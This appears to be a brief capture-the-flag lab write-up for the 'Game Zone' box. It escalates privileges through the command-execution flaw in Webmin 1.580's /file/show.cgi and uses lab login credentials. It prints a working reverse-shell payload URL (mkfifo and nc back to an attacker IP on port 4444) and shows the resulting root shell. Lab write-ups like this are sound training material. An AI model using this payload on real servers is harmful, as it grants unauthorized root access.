Game Zone [WEBMIN]

WEBMIN

The Service running on Port: 10000/TCP is Webmin
Version: 1.580 [VULNERABLE]
Using the Previously found Credentials to Login: agent47:videogamer124

Joomla

Privilege Escalation

The Vulnerability exists in the /file/show.cgi component and Allows an Authenticated User, with access to the File Manager Module, to Execute Arbitrary Commands with ROOT Privileges.

Reverse Shell PAYLOAD:

┌───────────┬────────────────────────────────────────────────────────────────────────────────────────────────────┐
| URL:      | IP:10000/file/show.cgi/A|rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc IP 4444 >/tmp/f| |
└───────────┴────────────────────────────────────────────────────────────────────────────────────────────────────┘

We can catch the Reverse Shell Using netcat

root@gamezone:~$ id
uid=0(root) gid=0(root) groups=0(root)

WEBMIN​

Privilege Escalation​

WEBMIN

Privilege Escalation